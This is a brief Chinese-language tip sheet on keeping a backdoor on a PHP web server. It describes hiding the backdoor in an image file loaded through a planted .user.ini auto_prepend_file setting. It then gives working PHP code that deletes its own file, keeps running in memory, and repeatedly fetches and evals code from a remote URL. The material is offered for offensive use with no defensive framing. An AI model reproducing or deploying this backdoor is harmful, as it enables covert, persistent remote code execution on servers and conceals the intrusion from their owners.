1、通过php.ini或者user.ini留后门 在一个有正常php文件的目录下新建一个.user.ini 内容为auto_prepend_file=xxx.gif(png/jpg)之类 而你的xxx.gif之类就是你的后门
2、后门的代码第一行删除自身,然后驻留在后台内存里,等待外部链接
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>